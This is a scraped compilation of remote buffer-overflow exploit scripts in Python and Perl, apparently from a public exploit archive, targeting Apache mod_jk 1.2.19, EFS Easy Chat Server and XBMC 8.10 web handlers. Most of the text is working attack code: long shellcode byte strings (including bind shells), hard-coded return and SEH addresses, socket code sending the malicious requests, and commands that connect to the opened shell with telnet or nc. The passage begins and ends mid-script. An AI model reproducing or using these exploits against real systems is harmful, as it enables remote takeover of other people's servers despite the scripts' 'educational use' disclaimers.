shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x 39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x 39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x 4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x 48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x 36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x 6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x 61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x 6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x 70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x 70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x 62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x 70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x 36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x 72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x 69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x 43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x 70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x 71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x 6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x 48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x 33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x 49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x 4f\x38\x50\x6e"
shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x 47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x 74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x 30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x 79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x 4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x 6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x 6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x 41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x 41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x 63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x 30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x 66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x 4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)
def usage():
print 'usage: %s <host>\n' % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
s.send('GET /' + payload)
s.close()
print ' [+] connecting to %s ...\n' % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print ' [-] EXPLOIT FAILED!\n'
if __name__ == '__main__':
print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#
# [2008-07-18]
80 EFS Easy Chat Server Authentication Request BOF Exploit (SEH)
#!/usr/bin/python
# Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
# Refer : http://www.enigmagroup.org/exploits/4289
# Tested on : Xp sp2 (fr)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ)
import struct
import socket
buf = "\x41"*216
buf += "\xEB\x06\xAE\xFA" #jmp+6
buf += "\xB6\xB2\x01\x10" #universal pop pop ret
buf += "\x90"*19
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf+=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xa4"
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\x a4\x0d\xa0\xff"
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x 84\x0c\xc0\xf3"
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\x a3\xcc\xe1\xb7"
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x 80\x0c\xc0\xdc"
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x 4f\x84\x77\x9e"
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x 2f\x4d\x27\x31"
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\x a4\x0d\xa0\xd2"
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\x cc\xfd\xa1\xbe"
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\x c7\x0d\x2b\xba")
head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n"
head += "Host: 127.0.0.1\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "\r\n\r\n")
s.close()
# [2009-03-03]
80 EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.enigmagroup.org/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[.................................................. ....]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# Sending Diabolic request...
# Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Easy Chat Server>
#
#[.................................................. ....]
#
# Enjoy!
#
use IO::Socket;
print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n";
$host = shift || die "Usage: perl $0 <host>\n";
$junk = "\x90" x 208;
$jmp = "\xEB\x06\xAE\xFA";
$ppr = "\xB6\xB2\x01\x10";
$shellcode = "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x 33\xc9\xb1".
"\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x 9c\x8f\x73".
"\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x 80\x55\x44".
"\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x 65\xb2\x06".
"\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\x a1\x4e\x58".
"\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x 49\x1c\x03".
"\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x 34\xec\x57".
"\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x 5a\xe7\x60".
"\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\x e4\x5d\x7b".
"\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x 74\xf5\xab".
"\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\x ee\xf7\xba".
"\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x 02\xa5\xc7".
"\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\x e7\x84\x9c".
"\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x 80\x5d\x71".
"\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x 07\x99\x07".
"\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x 9e\x96\xa7".
"\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\x ec\xf5\x79".
"\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\x bb\x57\xb3".
"\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x 32\xd9\xff".
"\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x 04\xdc\xbf".
"\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\x c6\x01\x8d".
"\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x 31\x4b\xfd".
"\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\x da\x80\x14";
$buffer = $junk.$jmp.$ppr.$shellcode;
$socket = IO::Socket::INET->new(PeerAddr=> $host,
PeerPort=> '80',
Proto=> 'tcp',
Timeout=>'1') || die "[-] Unable to Connect.!\n";
print " Sending Diabolic request...\n";
print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n";
print $socket "Host: $host\r\n\r\n\r\n";
close($socket);
print " Connecting to bindshell $host:9999\n\n";
system("nc $host 9999");
# [2009-03-04]
80 XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)
#!/usr/bin/env python
'''
Xbmc get request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
Release date:April the 1st 2009
versions affected:
Linux windows < tested
other versions are also possibly affected.
Restrictions:Bad chars need to be filtered.
This exploit happens when parsing and overly long
get request.We can gain control of the $eip register
the next 4bytes of our user supplied data is copied into
$esp register.
The 3 buffer overflows i found in xbmc have nothing in
common they are 3 separate overflow.Please see poc code
for further analysis.
I tried to evade the filtering when passing the shell code
by loading it into the other fields that where available.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
Junk_buffer = 'A'*1010
Jump_esp = struct.pack('<L',0x77F84143)
Shell_code=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x 4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x 4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x 43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x 42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x 4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x 42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x 4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x 42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x 4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x 43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x 42\x30\x5a"
)
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Junk_buffer + Jump_esp + Shell_code)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-01]
80 XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit
#!/usr/bin/env python
'''
Xbmc takescreenshot request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
Release date:April the 1st 2009
versions affected:
Linux windows < tested
other versions are also possibly affected.
Restrictions:No restrictions
This exploit happens when parsing and overly long file name
to the server using the takescreenshot command.
there is a description in the poc code.
When passing this to the http server we can evade url: filtering
as it is passed to the application as an overly long dir.
This means we can use any shell code we wish.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
Start_url ='xbmcCmds/xbmcHttp?command=takescreenshot('
Junk_buffer = 'A'*1036
Jump_esp = struct.pack('<L',0x77F84143)
Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
"\x4e\x36\x46\x32\x46\x32\x4b\x48\x45\x34\x4e\x53\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x 46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x32\x4b\x38"
"\x49\x48\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x 41\x53\x4b\x4d"
"\x46\x46\x4b\x48\x43\x44\x42\x53\x4b\x38\x42\x34\x 4e\x30\x4b\x38"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x 50\x45\x4a\x36"
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
"\x43\x35\x48\x36\x4a\x46\x43\x33\x44\x53\x4a\x46\x 47\x37\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x45\x 4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x55\x43\x55\x 43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x56\x 4a\x46\x41\x51"
"\x4e\x45\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x59\x 4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x52"
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x45\x 4f\x4f\x42\x4d"
"\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
"\x42\x35\x46\x45\x46\x35\x45\x55\x4f\x4f\x42\x4d\x 43\x39\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x 4a\x36\x43\x46"
"\x4d\x56\x49\x48\x45\x4e\x4c\x46\x42\x35\x49\x35\x 49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x 41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x 44\x34\x4e\x52"
"\x43\x59\x4d\x48\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x45\x41\x55\x41\x35\x 41\x45\x4c\x36"
"\x41\x30\x41\x55\x41\x35\x45\x45\x41\x35\x4f\x4f\x 42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x 47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x 4f\x4f\x42\x4d"
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x 4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
)
End_url ='.jpg;false;0;300;200;90)'
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-01]
80 XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit
#!/usr/bin/env python
'''
Xbmc get tag from file name request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
versions affected:
Linux windows < tested
other versions are also possibly affected.
Release date:April the 1st 2009
Restrictions:No filtering needed.
This exploit happens when parsing and overly long id3
tag to the web server.Dont think i covered this much
in the poc code as i was running out of time on this
exploit.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
Start_url ='xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/'
Junk_buffer = 'A'*1033
Jump_esp = struct.pack('<L',0x77F84143)
Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
"\x4e\x36\x46\x32\x46\x32\x4b\x48\x45\x34\x4e\x53\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x 46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x32\x4b\x38"
"\x49\x48\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x 41\x53\x4b\x4d"
"\x46\x46\x4b\x48\x43\x44\x42\x53\x4b\x38\x42\x34\x 4e\x30\x4b\x38"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x 50\x45\x4a\x36"
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
"\x43\x35\x48\x36\x4a\x46\x43\x33\x44\x53\x4a\x46\x 47\x37\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x45\x 4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x55\x43\x55\x 43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x56\x 4a\x46\x41\x51"
"\x4e\x45\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x59\x 4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x52"
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x45\x 4f\x4f\x42\x4d"
"\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
"\x42\x35\x46\x45\x46\x35\x45\x55\x4f\x4f\x42\x4d\x 43\x39\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x 4a\x36\x43\x46"
"\x4d\x56\x49\x48\x45\x4e\x4c\x46\x42\x35\x49\x35\x 49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x 41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x 44\x34\x4e\x52"
"\x43\x59\x4d\x48\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x45\x41\x55\x41\x35\x 41\x45\x4c\x36"
"\x41\x30\x41\x55\x41\x35\x45\x45\x41\x35\x4f\x4f\x 42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x 47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x 4f\x4f\x42\x4d"
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x 4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
)
End_url ='.mp3)'
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-01]
80 XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
#!/usr/bin/env python
'''
Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!!
Tested:Win xp sp2 eng Win vista sp1
Vendor url:http://xbmc.org/
Release date:April the 4th 2009
versions affected: windows all versions.
I had tried awhile to get a nice pop ebx pop ret address and just
could not find a suitable one especially that was any good.and it
had to be shipped with the application and not have /safe seh.
To start with i looked at the zlib.dll to see of there were any
nice pop pop ret address i noticed there was one in particular that
stood out and decided to try it.
There is no need for me to release any more exploits for this application
as i have covered all the areas which i wanted to and want to
move on from this.
If your interested to see how this worked attach a debugger and add some
hit tracing :).It is possible to use this with all the buffer overflows
i released.
